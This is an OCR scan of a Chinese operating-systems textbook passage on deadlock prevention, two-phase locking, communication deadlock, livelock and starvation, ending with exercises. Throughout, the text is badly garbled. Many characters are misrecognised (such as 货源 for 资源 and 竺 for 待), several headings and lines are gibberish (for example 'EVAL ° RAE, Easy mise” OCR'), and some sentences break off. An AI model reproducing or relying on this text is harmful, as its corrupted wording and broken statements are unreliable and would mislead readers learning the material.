那么 如 果 一 个 输出 进程 在 头 一 轮 打 印 之 后 决定 等 待 儿 个 小 时 ， 打 印 机 
吏 可 能 空置 。 为 了 避免 这 种 现象 ， 一 般 将 守护 进程 设计 成 在 完整 的 输 
出 文件 整 绪 后 才 开始 打印 。 例 如 ， 奢 两 个 进程 分 别 占 用 了 可 用 的 假 脱 
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Bike? 在 这 种 情形 下 ， 束 会 有 两 个 进程 ， 其 中 每 一 个 都 完成 了 部 分 
的 输出 ， 但 不 是 它们 的 全 部 输出 ， 于 十 无 法 继续 进行 下 去 。 没 有 一 个 
进程 能 够 守成， 结果 在 磁 一 上 出 现 了 和 死 锁 。 


不 过 ， 有 一 个 小 思路 十 经 党 可 适用 的 。 那 惑 是 ， 避 人 免 分 配 那 些 不 
征 绝对 必需 的 人 资源， 尽量 做 到 尽 可 能 少 的 进程 可 以 真正 请 求 货 源 。 


6.6.2 WA HAMS aR 


Coffman 等 表述 的 第 二 个 条 件 似 乎 更 有 布 望 。 只 要 禁止 已 持 有 资 
源 的 进程 再 等 待 其 他 资源 便 可 以 消除 死 锁 。 一 种 实现 方法 是 规定 所 有 
进程 在 开始 执行 前 请 求 所 需 的 全 部 货源 。 如 果 所 需 的 全 部 资产 可 用 ， 
那么 束 将 它们 分 配给 这 个 进程 ， 于 是 该 进程 肯定 能 够 运行 结束 。 如 末 
有 一 个 或 多 个 资源 正 被 使 用 ， 那 么 束 不 进行 分 配 ， 进 程 等 每 。 
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这 种 方法 的 一 个 直接 问题 是 很 多 进程 直到 运行 时 才 知 道 它 需要 多 
少 质 源 。 实 际 上 ， 如 果 进 程 能 够 知道 它 需要 多 少 质 源 ， 吏 可 以 使 用 银 
行家 算法 。 另 一 个 问题 是 这 种 方法 的 资源 利用 率 不 是 最 优 的 。 例 如 ， 
有 一 个 进程 先 从 输入 人 磁带 上 读 取 数据 ， 进 行 一 小 时 的 分 析 ， 最 后 会 写 
到 输出 磁 融 上 ， 同 时 会 在 绘图 仪 上 绘 出 。 如 果 所 有 资源 都 必须 提前 请 
求 ， 这 个 进程 本 会 把 输出 磁 市 机 和 绘图 仪 控制 住 一 小 时 。 


不 过 ， 一些 大 型 机 批 处 理 系 统 要 求 用 户 在 所 提交 的 作业 的 第 一 行 
列 出 它们 需要 多 少 资源 。 然 后 ， 系 统 立 即 分 配 所 需 的 全 部 资源 ， 并 且 
直到 作业 完成 才 回 收 资 源 。 虽 然 这 加 重 了 编程 人 员 的 负担 ， 也 造成 了 
资源 的 浪费 ， 但 这 的 确 防 止 了 死 锁 。 


另 一 种 破坏 占有 和 等 竺 条件 的 略 有 不 同 的 方案 是 ， 要 求 当 一 个 进 
程 请 求 资 源 时 ， 先 暂时 释放 其 当前 占用 的 所 有 资源 ， 然 后 青竹 试 一 次 


6.6.3 ”破坏 不 可 抢占 条 件 


破坏 第 三 个 条 件 (不 可 抢占 ) 也 是 可 能 的 。 假 者 一 个 进程 已 分 配 
到 一 人 台 打 印 机 ， 且 正在 进行 打印 输出 ， 如 果 由 于 它 需 要 的 绘图 仪 无 法 
获得 而 强制 性 地 把 它 占 有 的 打印 机 抢占 挤 ， 会 引起 一 片 混乱 。 但 是 ， 
一 些 资 源 可 以 通过 虚拟 化 的 方式 来 避免 发 生 这 样 的 情况 。 假 脱 机 打印 
机 疝 磁 副 输出 ， 并 且 只 允许 打印 机 守护 进程 访问 真正 的 物理 打印 机 ， 
这 种 方式 可 以 消除 涉及 打印 机 的 死 锁 ， 然 而 却 可 能 市 来 由 人 磁盘 空间 导 
致 的 死 锁 。 但 是 对 于 大 容量 磁盘 ， 要 消耗 完 所 有 的 做 盘 空 间 一 般 坪 不 
可 能 的 。 


然而 ， 并 不 是 所 有 的 资源 都 可 以 进行 类 似 的 虚拟 化 。 例 如 ， 数 据 
库 中 的 记录 或 者 操作 系统 中 的 表 都 必须 被 锁定 ， 因 此 存在 出 现 死 锁 的 
可 能 。 


6.6.4 ”破坏 环 路 等 竺 条件 


现在 只 剩 下 一 个 条 件 了 。 消 除 环 路 等 待 有 几 种 方法 。 一 种 是 保证 
每 一 个 进程 在 任何 时 刻 只 能 占用 一 个 资源 ， 如 果 要 请 求 另 外 一 个 次 
源 ， 它 必须 先 释放 第 一 个 资源 。 但 假若 进程 正在 把 一 个 大 文件 从 磁带 
机 上 读 入 并 送 到 打印 机 打印 ， 那 么 这 种 限制 是 不 可 接受 的 。 


另 一 种 避免 出 现 环 路 等 待 的 方法 是 将 所 有 资源 统一 编号 ， 如 图 6- 
13a 所 示 。 现 在 的 规则 是 : 进程 可 以 在 任何 时 刻 提 出 资源 请 求 ， 但 是 所 
有 请 求 必须 按照 资源 编号 的 顺序 SAP) 提出 。 进 程 可 以 先 请 求 打印 
机 后 请 求 磁 市 机 ， 但 不 可 以 先 请 求 绘图 仪 后 请 求 打 印 机 。 


.图 像 处 理 仪 
.打印 机 Q 


. 绘图 仪 
. ee aT AL 
.CD-ROM 驱 动 器 
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6-13 a) 对 资源 排序 编号 ; b) 一 个 资源 分 配 图 


铬 按 此 规则 ， 资 源 分 配 图 中 肯定 不 会 出 现 环 。 让 我 们 看 看 在 有 两 
个 进程 的 情形 下 为 何 可 行 ， 参 看 图 6-13b。 只 有 在 A 请 求 资源 j 且 B 请 求 


资源 i 的 情况 下 会 产生 死 锁 。 假 设 i 和 j 是 不 同 的 资源 ， 它 们 会 具有 不 同 
的 编号 。 若 i>j， 那 么 A 不 允许 请 求 ]， 因 为 这 个 编号 小 于 A 已 有 资源 的 
编号 ， 若 i<j， 那 么 B 不 允许 请 求 1， 因 为 这 个 编号 小 于 B 已 有 资源 的 编 

o 不 论 哪 种 情况 都 不 可 能 产生 死 锁 。 


对 于 多 于 两 个 进程 的 情况 ， 同 样 的 逻辑 依然 成 立 。 在 任何 时 候 ， 
总 有 一 个 已 分 配 的 资源 是 编号 最 高 的 。 占 用 该 资源 的 进程 不 可 能 请 求 
其 他 已 分 配 的 各 种 资源 。 它 或 者 会 执行 完毕 ， 或 者 最 坏 的 情形 征 去 请 
求 编号 更 高 的 资源 ， 而 编号 更 高 的 资源 肯定 是 可 用 的 。 最 终 ， 它 会 结 
束 并 释放 所 有 资源 ， 这 时 其 他 占有 最 融 编 号 资源 的 进程 也 可 以 执行 
完 。 人 答 言 之 ， 存 在 一 种 所 有 进程 都 可 以 执行 完毕 的 情景 ， 所 以 不 会 产 
“ECB S 


该 算法 的 一 个 变种 是 按 弃 必须 按 升序 请 求 货 源 的 限制 ， 而 仅仅 要 
求 不 允许 进程 请 求 比 当前 所 占有 资源 编号 低 的 资源 。 所 以 ， 在 一 个 进 
程 起 初 请 求 9 号 和 10 号 资源 ， 而 随后 释放 两 者 ， 那 么 它 实 际 上 相当 于 从 
头 开始 ， 所 以 没有 必要 阻止 它 现 在 请 求 1 号 资源 。 


尽管 对 资源 编号 的 方法 消除 了 死 锁 的 问题 ， 但 几乎 找 不 出 一 种 使 
每 个 人 部 满意 的 编号 次 序 。 当 资源 包括 进程 表 项 、 假 脱 机 磁盘 空间 、 
加 锁 的 数据 库 记 录 及 其 他 抽象 资源 时 ， 潜 在 的 资源 及 各 种 不 同 用 途 的 
数目 会 变 得 很 大 ， 以 至 于 使 编号 方法 根本 无 法 使 用 。 


死 锁 预 防 的 各 种 方法 如 图 6-14 所 示 。 


一 切 都 使 用 假 脱 机 技术 
占有 和 等 竺 在 开始 就 请 求全 部 资源 


不 可 抢占 抢占 资源 


6-14 ”和 死 锁 预 防 方法 汇总 


6.7 其 他 问题 


在 本 节 中 ， 我 们 会 讨论 一 些 和 和 死 锁 相关 的 问题 ， 包 括 两 阶段 加 
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6.7.1 ”两 阶段 加 后 


虽然 在 一 般 情 况 下 避免 死 饥 和 预防 死 锁 并 不 是 很 有 硕 望 ， 但 是 在 
一 些 特殊 的 应 用 方面 ， 有 很 多 卓越 的 专用 算法 。 例 如 ， 在 很 多 数据 库 
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住 的 记录 。 当 同时 有 多 个 进程 运行 时 ， 束 有 出 现 死 锁 的 危险 。 


常用 的 方法 是 两 阶段 加 锁 (two-phase locking) 。 在 第 一 阶段 ， 进 
程 试图 对 所 有 所 需 的 记录 进行 加 锁 ， 一 次 锁 一 个 记录 。 如 采 第 一 阶段 
加 锁 成 功 ， 束 开始 第 二 阶段 ， 完 成 更 新 然后 释放 锁 。 在 第 一 阶段 并 没 
有 做 实际 的 工作 。 


如 栗 在 第 一 阶段 某 个 进程 需要 的 记录 已 经 被 加 锁 ， 那 么 该 进程 释 
放 它 所 有 加 锁 的 记录 ， 然 后 重新 开始 第 一 阶段 。 从 某 种 意义 上 说 ， 这 
种 方法 类 似 于 提前 或 者 至 少 是 未 实施 一 些 不 可 逆 的 操作 之 前 请 求 所 有 
资源 。 在 两 阶段 加 锁 的 一 些 版 本 中 ， 如 采 在 第 一 阶段 中 到 了 已 加 锁 的 
记录 ， 并 不 会 释放 锁 然 后 重新 开始 ， 这 就 可 能 产生 死 锁 。 


不 过 ， 在 一 般 意 义 下 ， 这 种 策略 并 不 通用 。 例 如 ， 在 实时 系统 和 
进程 控制 系统 中 ， 由 于 一 个 进程 缺少 一 个 可 用 资源 允 半 途中 断 它 ， 并 
重新 开始 该 进程 ， 这 征 不 可 接受 的 。 如 果 一 个 进程 已 经 在 网 络 上 读 写 
消 轧 、 更 新 文件 或 从 事 任 何不 能 安全 地 重复 做 的 事 ， 那 么 重 狐 运行 进 
程 也 是 不 可 接受 的 。 只 有 当 程 序 员 仔细 地 安排 了 程序 ， 使 得 在 第 一 阶 
段 程序 可 以 在 任意 一 点 俘 下 来 ， 并 重新 开始 而 不 会 产生 错误 ， 这 时 这 
个 算法 才 可 行 。 但 很 多 应 用 并 不 能 按 这 种 方式 来 设计 。 


6.7.2 ”通信 人 死 锁 


到 目前 为 止 ， 我 们 所 有 的 工作 都 着 眼 于 资源 死 锁 。 一 个 进程 需要 
使 用 另外 一 个 进程 拥有 的 资源 ， 因 此 必须 等 待 直至 该 进程 停止 使 用 这 
些 资 源 。 有 了 时 资源 是 硬件 或 者 软件 ， 比 如 说 CD-ROM 驱 动 絮 或 者 数据 
库 记 录 ， 但 是 有 了 时 它们 更 加 抽象 。 在 图 6-2 中 ， 可 以 看 到 当 资 源 互 不 时 
发 生 的 资源 死 锁 。 这 比 CD-ROM 了 驱动 絮 更 抽象 一 点 ， 但 是 在 这 个 例子 
中 ， 每 个 进程 都 成 功 调 用 一 个 资源 ( 互 不 锁 之 一 ) 而 且 死 锁 的 进程 答 
试 去 调用 另外 的 资源 ( 男 一 个 互 不 锁 ; 。 这 种 情况 是 典型 的 资源 死 
锁 。 


然而 ， 正 如 我 们 在 本 章 开始 提 到 的 ， 资 源 死 锁 是 最 普 过 的 一 种 类 

， 但 不 是 惟一 的 一 种 。 另 一 种 死 锁 发 生 在 通信 系统 中 (比如 说 网 
络 ) ， 即 两 个 或 两 个 以 上 进程 利用 发 送信 息 来 通信 时 。 一 种 普遍 的 情 
形 是 进程 A 向 进程 B 发 送 请 求 信息 ， 然 后 阻塞 直至 B 回 复 。 假 设 请 求 信 
妃 丢 失 ，A 将 阻塞 以 等 待 回复 ， 而 B 会 阻塞 等 待 一 个 向 其 发 送 命令 的 请 
求 ， 因 此 发 生死 锁 。 


仅仅 如 此 并 非 经 典 的 资源 死 锁 。A 没 有 占有 B 所 需 的 资源 ， 反 之 亦 
然 。 事 实 上 ， 并 没有 完全 可 见 的 资源 。 但 是 ， 根 据 标准 的 定义 ， 在 一 
系列 进程 中 ， 每 个 进程 因为 等 待 另 外 一 个 进程 引发 的 事件 而 产生 阻 
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情况 叫做 通信 和 死 锁 (communication deadlock) ° 


通信 死 锁 不 能 通过 对 资源 排序 (因为 没有 ) 或 者 通过 仔细 地 安排 
调度 来 避免 〈 因 为 任何 时 刻 的 请 求 都 是 不 被 允许 延迟 的 ) 。 幸 运 的 
是 ， 男 外 一 种 技术 通常 可 以 用 来 中 断 通 信 死 锁 : 超时 。 在 大 多 数 网 络 
通信 系统 中 ， 个 信息 被 发 送 至 一 个 特定 的 地 方 ， 并 等 待 其 返回 
一 个 预期 的 回复 ， 发 送 者 束 同 时 局 动 计时 器 。 奉 计时 右 在 回复 到 达 前 
计时 惑 停止 了 ， 则 信息 的 发 送 者 可 以 认定 信息 已 经 丢失 ， 并 重新 发 送 
(如 果 需 要 ， 则 一 直 重 复 ) 。 通 过 这 种 方式 ， 可 以 避免 死 锁 。 


当然 ， 如 果 原 始 信息 没有 丢失 ， 而 仅仅 是 回复 延 时 ， 接 收 者 可 能 
收 到 两 次 或 者 更 多 次 信息 ， 甚 至 导致 意 想 不 到 的 结果 。 想 象 电 子 银行 
系统 中 包含 付款 说 明 的 信息 。 很 明显 ， 不 应 该 仅仅 因为 网 速 缓慢 或 者 
超时 设 定 太 短 ， 就 重复 (并 执行 ) 多 次 。 应 该 将 通信 规则 一 一 通常 称 
为 协议 (protocol) 一 一 设计 为 让 所 有 事情 都 正确 ， 这 是 一 个 复杂 的 课 
题 ， 超 出 了 本 书 的 范围 。 对 网 络 协 议 感 兴趣 的 读者 可 以 参考 作者 的 另 
外 一 本 书 一 《Computer Networks) (Tanenbaum, 2003) ° 


并 非 所 有 在 通信 系统 或 者 网 络 发 生 的 死 锁 都 是 通信 和 死 锁 。 资 源 死 
锁 也 会 发 生 ， 如 图 6-15 中 的 网 络 。 这 张 图 是 因特网 的 简化 图 (极其 简 
化 ) 。 因 特 网 由 两 类 计算 机 组 成 :， 主机 和 路 由 器 。 主 机 (host) 是 一 台 
用 户 计 算 机 ， 可 以 是 某 人 家 里 的 PC 机 、 公 司 的 个 人 计算 机 ， 也 可 能 是 


一 个 共享 服务 器 。 主 机 由 人 来 操作 。 路 由 器 (router) 是 专用 的 通信 计 
算 机 ， 将 数据 包 从 源 发 送 至 目的 地 。 每 台 主 机 都 连接 一 个 或 更 多 的 路 
由 器 ， 可 以 用 一 条 DSL 线 、 有 线 电视 连接 、 局 域 网 、 拨 号 线路 、 无 线 
网 络 、 光 纤 等 来 连接 。 
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图 6-15 一 个 网 络 中 的 资源 死 锁 


当 一 个 数据 包 从 一 个 主机 进入 路 由 器 时 ， 它 被 放 入 一 个 缓冲 器 
中 ， 然 后 传输 到 另外 一 个 路 由 器 ， 再 到 另 一 个 ， 直 至 目的 地 。 这 些 组 
冲 器 都 是 资源 并 且 数 目 有 限 。 在 图 6-15 中 ， 每 个 路 由 器 都 有 8 个 缓冲 器 
(实际 应 用 中 有 数 以 百 万 计 ， 但 是 并 不 能 改变 潜在 死 锁 的 本 质 ， 只 是 
改变 了 它 的 频率 ) 。 假 设 路 由 器 A 的 所 有 数据 包 需 要 发 送 到 B，B 的 所 
有 数据 包 需 要 发 送 到 C，C 的 所 有 数据 包 需 要 发 送 到 D， 然 后 D 的 所 有 


数据 包 需 要 发 送 到 A。 那 么 没有 数据 包 可 以 移动 ， 因 为 在 另 一 端 没 有 
缓冲 器 。 这 束 是 一 个 典型 的 资源 死 铬 ,尽管 它 发 生 在 通信 系统 


6.7.3” 活 锁 


在 某 种 情形 下 ， 轮 询 〈 忙 等 待 ) 可 用 于 进入 临界 区 或 存 取 资 源 。 
采用 这 一 策略 的 主要 原因 是 ， 相 比 所 做 的 工作 而 言 ， 互 斥 的 时 间 很 短 
而 挂 起 等 待 的 时 间 开 销 很 大 。 考 虑 一 个 原 语 ， 通 过 该 原 语 ， 调 用 进程 
测试 一 个 互 斥 信号 量 ， 然 后 或 者 得 到 该 信号 量 或 者 返回 失败 信息 。 如 
图 2-26 中 的 例子 所 示 。 


现在 假设 有 一 对 进程 使 用 两 种 资源 ， 如 图 6-16 所 示 。 每 个 进程 需 
要 两 种 资源 ， 它 们 利用 轮 询 原 语 enter_region 去 尝试 取 得 必要 的 锁 ， 如 
果 党 斌 失败 ， 则 该 进程 继续 尝试 。 在 图 6-16 中 ， 如 果 进 程 A 先 运 行 并 
得 到 资源 1， 然 后 进程 2 运行 并 得 到 资源 2， 以 后 不 管 哪 一 个 进程 运行 ， 
都 不 会 有 任何 进展 ， 但 是 哪 一 个 进程 也 没有 被 阻塞 。 结 果 是 两 个 进程 
总 是 一 再 消耗 完 分 配给 它们 的 CPU 配额 ， 但 是 没有 进展 也 没有 阻塞 。 
因此 ， 没 有 出 现 死 锁 现 象 《因为 没有 进程 阻塞 ) ， 但 是 从 现象 上 看 好 
像 死 锁 发 生 了 ， 这 就 是 活 锁 (livelock) 


void process_A(void) { 
enter_region(&resource _ 1); 
enter_region(&resource _ 2); 
use_both_resources( ); 
leave_region(&resource _ 2); 
leave_region(&resource _ 1); 


} 


void process_B(void) { 
enter_region(&resource _ 2); 
enter_region(&resource _ 1); 
use_both_resources( ); 
leave_region(&resource _ 1); 
leave_region(&resource _ 2); 


图 6-16 和 忙 等 待 可 能 导致 活 锁 


活 锁 也 经 常 出 人 意料 地 产生 。 在 一 些 系统 中 ， 进 程 表 中 容纳 的 进 
程 数 决 定 了 系统 允许 的 最 大 进程 数量 ， 因 此 进程 表 属 于 有 限 的 资源 。 
如 果 由 于 进程 表 满 了 而 导致 一 次 fork 运 行 失 败 ， 那 么 一 个 合理 的 方法 
征 : 该 程序 等 待 一 段 随 机 长 的 时 间 ， 然 后 再 次 笑 试 运行 fork 。 


现在 假设 一 个 UNIX 系 统 有 100 个 进程 槽 ，10 个 程序 正在 运行 ， 每 
个 程序 需要 创建 12 个 (T) 进程 。 在 每 个 进程 创建 了 9 个 进程 后 ，10 个 
源 进 程 和 90 个 新 的 进程 就 已 经 占 满 了 进程 表 。10 个 源 进程 此 时 便 进 入 
了 死 锁 了 分 支 循环 和 运行 失败 。 发 生 这 种 情况 的 可 能 性 


是 极 小 的 ， 但 是 ， 这 是 可 能 发 生 的 ! 我 们 是 否 应 该 放弃 进程 以 及 fork 
调用 来 请 除 这 个 问题 呢 ? 


限制 打开 文件 的 最 大 数量 与 限制 索引 节点 表 的 大 小 的 方式 很 相 
像 ， 因 此 ， 当 它 被 完全 占用 的 时 候 ， 也 会 出 现 相似 的 问题 。 硬 盘 上 的 
交换 空间 是 男 一 个 有 限 的 资源 。 事 实 上 ， 几 平 操作 系统 中 的 每 种 表 都 
代表 了 一 种 有 限 的 资源 。 如 果 有 n 个 进程 ， 每 个 进程 都 申请 了 1/n 的 资 
源 ， 然 后 每 一 个 义 试图 申请 更 多 的 资源 ， 这 种 情况 下 我 们 是 不 古 应 该 
REMA? 也 许 这 不 是 一 个 好 主意 。 


大 多 数 的 操作 系统 (包括 UNIX 和 Windows) 都 忽略 了 一 个 问题 ， 
即 比 起 限制 所 有 用 户 去 使 用 一 个 进程 、 一 个 打开 的 文件 或 任意 一 种 资 
源 来 说 ， 大 多 数 用 户 可 能 更 愿意 选择 一 次 偶然 的 活 锁 (或 者 甚至 是 死 
Bt) 。 如 果 这 些 问题 能 够 免费 消除 ， 那 就 不 会 有 争论 。 但 问题 是 代价 
非常 高 ， 因 而 几乎 都 是 给 进程 加 上 不 便 的 限制 来 处 理 。 因 此 我 们 面 对 
的 问题 是 从 便捷 性 和 正确 性 中 做 出 取舍 ， 以 及 一 系列 天 于 哪个 更 重 
要 、 对 谁 更 重要 的 争论 。 


值得 一 提 的 是 ， 一 些 人 对 饥饿 缺乏 资源 ， 和 死 锁 并 不 作 区 分 ， 
因为 在 两 种 情况 下 都 没有 下 一 步 操作 了 “。 还 有 些 人 认为 它们 从 根本 上 
不 同 ， 因 为 可 以 很 轻易 地 编写 一 个 进程 ， 让 它 做 某 个 操作 n 次 ， 并 且 如 
果 它 们 都 失败 了 ， 表 试 试 其 他 的 束 可 以 了 。 一 个 阻塞 的 进程 束 没 有 那 
样 的 选择 了 。 


6.7.4 Vuk 


SCA TE BE Fs FELL lee LE (starvation) 。 在 动态 
运行 的 系统 中 ， 在 任何 时 刻 都 可 能 请 求 资 源 。 这 就 需要 一 些 策 略 来 决 
定 在 什么 时 候 谁 获得 什么 资源 。 虽 然 这 个 策略 表面 上 很 有 道理 ， 但 依 
然 有 可 能 使 一 些 进程 永远 得 不 到 服务 ， 虽 然 它 们 并 不 是 死 锁 进 程 。 


作为 一 个 例子 ， 考 虑 打印 机 分 配 。 设 想 系统 采用 某 种 算法 来 保证 
打印 机 分 配 不 产生 死 锁 。 现 在 假设 大 和 干 进程 同时 都 请 求 打印 机 ， 究 苋 
哪 一 个 进程 能 获得 打印 机 呢 ? 


一 个 可 能 的 分 配方 案 是 把 打印 机 分 配给 打印 最 小 文件 的 进程 〈 假 
设 这 个 信息 可 知 ) 。 这 个 方法 让 尽量 多 的 顾客 满意 ， 并 且 看 起 来 很 公 
平 。 我 们 考虑 下 面 的 情况 : 在 一 个 党 忙 的 系统 中 ， 有 一 个 进程 有 一 个 
很 大 的 文件 要 打印 ， 每 当 打印 机 空闲 ， 系 统 纵 观 所 有 进程 ， 并 把 打印 
机 分 配给 打印 最 小 文件 的 进程 。 如 果 存 在 一 个 固定 的 进程 流 ， 其 中 的 
进程 都 是 只 打印 小 文件 ， 那 么 ， 要 打印 大 文件 的 进程 永远 也 得 不 到 打 
EVAL ° RAE, Easy mise” OCR, RECA BRE 
塞 ) 。 


饥 俄 可 以 通过 先 来 先 服务 资源 分 配 策略 来 避免 。 在 这 种 机 制 下 ， 
等 竺 最 久 的 进程 会 是 下 一 个 被 调度 的 进程 。 随 着 时 间 的 推移 ， 所 有 进 


程 都 会 变 成 最 “ 老 ”" 的 ， 因 而 ， 最 终 能 够 获得 资源 而 完成 。 


6.8 ERMIR, 


死 锁 在 操作 系统 发 展 的 早期 束 作 为 一 个 课题 被 详细 地 研究 过 。 死 
锁 的 检测 是 一 个 经 典 的 图 论 问 题 ， 任 何 对 数学 有 兴趣 的 研究 生 都 可 以 
在 其 上 做 3~-4 年 的 研究 。 所 有 相关 的 算法 都 已 经 经 过 了 反复 修正 ， 但 
每 次 修正 总 是 得 到 更 古怪 、 更 不 现实 的 算法 。 大 部 分 工作 已 经 结束 
了 ,但 是 仍然 有 很 多 关于 死 锁 各 方面 内 容 的 论文 发 表 。 这 些 论文 包括 
由 于 错误 使 用 锁 和 信号 量 而 导致 的 死 锁 的 运行 时 间 检 测 (Agarwal 和 
Stoller,2006; Bensalem 等 人 ,2006) ; 在 Java 线 程 中 预防 死 锁 
(Permandia 等 人 ，2007; Williams 等 人 ，2005) ; 处 理 网 络 上 的 死 锁 
(Jayasimha,2003; Karol 等 人 ，2003; Schafer 等 人 ，2005) ; 数据 流 
系统 中 的 死 锁 建 模 (Zhou 和 Lee,2006) ; 检测 动态 死 锁 (Li 等 人 ， 
2005) ° Levine (2003a,2003b) 比较 了 文献 中 关于 死 锁 各 种 不 同 的 
(经 常 相 矛 盾 的 ) 定义 ， 从 而 提出 了 一 个 分 类 方案 。 她 也 从 另外 的 角 
度 分 析 了 关于 预防 死 锁 和 避免 死 锁 的 区 别 (Levine, 2005) 。 而 死 锁 
和 恢复 也 是 一 个 正在 研究 的 问题 (David 等 人 ，2007) ° 


To 


然而 ， 还 有 一 些 (理论 ) 研究 是 关于 分 布 式 死 锁 检测 的 ， 我 们 在 
这 里 不 做 表述 ， 因 为 它 超 出 了 本 书 的 范围 ， 而 且 这 些 人 研究 在 实际 系统 
中 的 应 用 非常 少 ， 似 乎 只 是 为 了 让 一 些 图 论 家 有 事 可 做 轻 了 。 


6.9 小结 


死 锁 是 任何 操作 系统 的 淤 在 问题 。 在 一 组 进程 中 ， 每 个 进程 都 因 
等 等 由 该 组 进程 中 的 男 一 进程 所 占有 的 资源 而 导致 蛆 塞 ， 死 锁 束 发 生 
了 。 这 种 情况 会 使 所 有 的 进程 都 处 于 无 限 等 竺 的 状态 。 一 般 来 讲 ， 这 
征 进 程 一 直 等 待 被 其 他 进程 占用 的 茶 些 资源 释放 的 事件 。 死 锁 的 即 外 
一 种 可 能 的 情况 是 一 组 通信 进程 都 在 等 竺 一 个 消 思 ， 而 通信 信道 却 是 
空 的， 并 且 也 没有 采用 超时 机 制 。 


通过 跟踪 哪 一 个 状态 是 安全 状态 ， 哪 一 个 状态 是 不 安全 状态 ， 可 
以 避免 死 凯 。 安 全 状态 束 是 这 样 一 个 状态 : 存在 一 个 事件 序列 ， 保 证 
所 有 的 进程 都 能 完成 。 不 安全 状态 就 不 存在 这 样 的 保证 。 银 行家 算法 
可 以 通过 拒绝 可 能 引起 不 安全 状态 的 请 求 来 避免 死 锁 。 


也 可 以 在 设计 系统 时 就 不 允许 死 锁 发 生 ， 从 而 在 系统 结构 上 预防 
死 锁 的 发 生 。 例 如 ， 只 允许 进程 在 任何 时 刻 最 多 占有 一 个 资产， 这 丈 
破坏 了 循环 等 竺 环 路 。 也 可 以 将 所 有 的 资源 编号 ， 规 定 进程 按 挛 格 的 
升序 请 求 资 源 ， 这 样 也 能 预防 死 锁 。 


资源 死 锁 并 不 是 惟一 的 一 种 死 锁 。 尽 管 我 们 可 以 通过 设置 适当 的 
超时 机 制 来 解决 通信 死 锁 ,但 它 依 然 古 某 些 系统 中 次 在 的 问题 。 


fa ASC RAY lel ER, Abate’ Et Ay DS LA A IIR Act 
程 ,但 是 二 者 在 技术 上 不 同 ， 由 于 活 锁 包 售 了 一 些 实际 上 并 没有 锁 住 
的 进程 ， 因 此 可 以 通过 先 来 先 服务 的 分 配 策 略 来 避免 纪 场 。 


习题 
1. 给 出 一 个 由 策略 产生 的 死 锁 的 例子 。 


2. 学 生 们 在 机 房 的 个 人 计算 机 上 将 目 己 要 打印 的 文件 发 送 给 服务 
胡 ， 服 务 磊 会 将 这 些 文件 暂 存 在 它 的 醒 副 上 “。 如 有 果 服 务 器 磁 表 空 间 有 
限 ， 那 么 ， 在 什么 情况 下 会 产生 死 锁 ? 这 样 的 死 锁 应 该 怎样 避免 ? 


3. 在 图 6-1 中 ， 资 源 释放 的 顺序 与 获得 的 顺序 相反 ， 以 其 他 的 顺序 
释放 资源 能 否 得 到 同样 的 结果 ? 


4 一 个 资源 死 锁 的 发 生 有 四 个 必要 条 件 ( 互 不 使 用 资源 、 占 有 和 
等 待 资源 、 不 可 抢占 资源 和 环 路 等 待 资源 ) 。 举 一 个 例子 说 明 这 些 条 
件 对 于 一 个 资源 死 锁 的 发 生 不 臣 充分 的 。 何 时 这 些 条件 对 一 个 资源 死 
PACE EIT ARTE? 


5. 图 6-3 给 出 了 资源 分 配 图 的 概念 ， 试 问 是 否 存 在 不 合理 的 资源 分 
配 图 ， 即 资源 分 配 图 在 结构 上 违反 了 使 用 资源 的 模型 ? 如 采 存 在 ， 请 
给 对 一 个 例子 。 


6. 假 设 一 个 系统 中 存在 一 个 资源 死 锁 。 举 一 个 例子 说 明 死 锁 的 进 
程 集合 中 可 能 包括 了 不 在 相应 的 资源 分 配 图 中 循环 链 中 的 进程 。 
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否 给 出 一 种 能 够 使 系统 管理 员 从 这 种 状况 下 恢复 系统 的 方法 ? 


8. 解 释 系 统 是 如 何 从 前 面 问题 的 死 锁 中 恢复 的 ， 使 用 a) 抢 占 ; b) 回 
TR; 0c) 终 止 进程 。 


9. 假 设 在 图 6-6 中 ， 对 某 个 j， 有 Ci; +Rij > El ， 这 意味 着 什么 ? 


10. 请 说 明 表 6-8 中 的 模型 与 6.5.2 市 描述 的 安全 状态 和 不 安全 状态 
ATTA BAER ° ARORA a Ree IT A? 


11. 图 6-8 所 示 的 资源 轨迹 模式 是 否 可 用 来 说 明 三 个 进程 和 三 个 次 
源 的 死 锁 问题 如 果 可 以 ， 它 是 怎样 说 明 的 ? 如 果 不 可 以 ， 请 解释 为 
什么 。 


12. 理 论 上 ， 资 源 轨 迹 图 可 以 用 于 避免 死 锁 。 通 过 合理 的 调度 ， 操 
作 系统 可 避免 进入 不 安全 区 域 。 请 列举 一 个 在 实际 运用 这 种 方法 时 会 


市 来 的 问题 。 


13. 一 个 系统 是 否 可 能 处 于 既 非 死 锁 也 不 安全 的 状态 ? 如 果 可 以 ， 
举 出 例 于 ， 如 采 不 可 以 ， 请 证 明 所 有 状态 只 能 处 于 死 锁 或 安全 两 种 状 


人 


14. 考 虑 一 个 使 用 银行 家 算法 避免 死 锁 的 系统 。 某 个 时 刻 一 个 进程 
P 请 求 资 源 R， 但 即使 R 当 前 可 用 这 个 请 求 也 被 拒绝 了 。 如 果 系统 分 配 


REP, EDERE RNN RICD? 
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需求 的 信息 。 有 没有 可 能 设 
法 ? 解释 你 的 方法 。 


计 一 个 不 需要 这 些 信息 而 避免 死 锁 的 算 


16. 仔 细 考 察 图 6-1tb， 如 果 D 再 多 请 求 1 个 单位 ， 会 导致 安全 状态 


还 是 不 安全 状态 ? 如 果 换 成 C 提 出 同样 请 求 ， 情 形 会 怎样 ? 


DA 


17. 某 一 系统 有 两 个 进程 和 三 个 相同 的 资源 。 每 个 进程 最 多 需要 两 
INR 


资源 。 这 种 情况 下 有 没有 可 能 发 生死 锁 ? 为 什么 ? 


18. 再 考虑 上 一 个 问题 ， 但 现在 有 p 个 进程 ， 每 个 进程 最 多 需要 m 个 
货源 ， 并 且 有 r 个 资 


源 可 用 。 什 么 样 的 条 件 可 以 保证 死 锁 不 会 发 生 ? 


19. 假 设 儿 6-12 中 的 进程 A 请 求 最 后 一 合 磁 市 机 ， 这 一 操作 会 引起 
死 锁 吗 ? 


20. 一 个 计算 机 有 6 人 台 磁带 机 ， 由 nm 个 进程 竞争 使 用 ， 每 个 进程 可 能 
需要 两 台 和 磁 帝 机 ， 那 么 n 征 多 少时 系统 才 没 有 和 死 锁 的 危险 ? 


21 银行 家 算法 在 一 个 有 m 个 资源 类 型 和 n 个 进程 的 系统 中 运行 。 当 
m 和 n 都 很 大 时 ， 为 检查 状态 是 否 安全 而 进行 的 操作 次 数 正比 于 ma nb 
o a 和 b 的 值 是 多 少 ? 


